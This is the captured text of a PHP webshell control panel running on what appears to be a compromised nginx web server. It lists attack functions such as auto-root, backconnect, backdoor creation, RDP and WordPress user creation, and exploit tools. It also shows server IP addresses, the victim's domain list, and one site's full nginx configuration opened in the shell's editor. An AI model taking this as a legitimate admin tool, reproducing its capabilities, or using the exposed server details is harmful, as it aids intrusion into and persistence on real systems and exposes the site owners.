Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
nginx /
conf.d /
[ HOME SHELL ]
Name
Size
Permission
Action
berripix.com.conf
3.3
KB
-rw-rw-r--
legendbo.com.conf
2.17
KB
-rw-rw-r--
mangaberri.com.conf
3.29
KB
-rw-rw-r--
mangacherri.com.conf
2.03
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : berripix.com.conf
# Redirect HTTP to HTTPS server { if ($host = www.berripix.com) { return 301 https://$host$request_uri; } # managed by Certbot if ($host = berripix.com) { return 301 https://$host$request_uri; } # managed by Certbot listen 80; server_name berripix.com www.berripix.com; add_header X-Redirected-By "nginx 302 temporary" always; return 302 https://$host$request_uri; } server { listen 443 ssl http2; server_name berripix.com www.berripix.com; root /var/www/html/mangapix/public_html; index index.php index.html; client_max_body_size 1000M; client_body_timeout 120s; send_timeout 120s; proxy_read_timeout 120s; proxy_connect_timeout 120s; proxy_send_timeout 120s; ssl_certificate /etc/letsencrypt/live/berripix.com/fullchain.pem; # managed by Certbot ssl_certificate_key /etc/letsencrypt/live/berripix.com/privkey.pem; # managed by Certbot include /etc/letsencrypt/options-ssl-nginx.conf; ssl_dhparam /etc/letsencrypt/ssl-dhparams.pem; error_log /var/log/nginx/berripix_error.log debug; # Serve PHP files in any subfolder (e.g. /bo/index.php) location ~ ^/(berribo|cherribo|spicybo)/.+\.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php8.3-fpm.sock; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; include fastcgi_params; } # Allow static + PHP file fallback in any subfolder location ~ ^/(berribo|cherribo|spicybo)(/.*)?$ { try_files $uri $uri/ $uri.php?$query_string; } # Handle specific root-level short URLs location = /actions { try_files $uri $uri/ /actions.php?$query_string; } location = /search { try_files $uri $uri/ /search.php?$query_string; } location = /index { try_files $uri $uri/ /index.php?$query_string; } location = /terms_of_service { try_files $uri $uri/ /terms_of_service.php?$query_string; } # Root handler — try .php fallback before slug location / { #try_files $uri $uri/ $uri.php @slug; #try_files $uri $uri/ $uri.php @clean_urls; try_files $uri $uri/ @clean_urls; } # Slug rewrite fallback (e.g. /vegeta → detail.php?title=vegeta) #location @slug { # rewrite ^/([^/]+)$ /detail.php?title=$1 last; #} # Clean URLs rewriting location @clean_urls { add_header X-Rewrite "clean_urls triggered" always; rewrite ^/genre/([^/]+)$ /genre.php?genre=$1 last; rewrite ^/([A-Za-z0-9_-]+)/([0-9]+)$ /reading.php?title=$1&chapter=$2 last; rewrite ^/([A-Za-z0-9_-]+)$ /read-manga.php?title=$1 last; rewrite ^(.*)$ /index.php?$args last; } # Global PHP handler for files like /index.php, /terms_and_conditions.php location ~ \.php$ { include snippets/fastcgi-php.conf; fastcgi_pass unix:/run/php/php8.3-fpm.sock; fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name; fastcgi_param HTTPS on; include fastcgi_params; } # Block hidden files (e.g. .git, .env) location ~ /\. { deny all; } # Cache static assets location ~* \.(?:jpg|jpeg|png|gif|webp|css|js)$ { expires 30d; add_header Cache-Control "public"; access_log off; } }
Close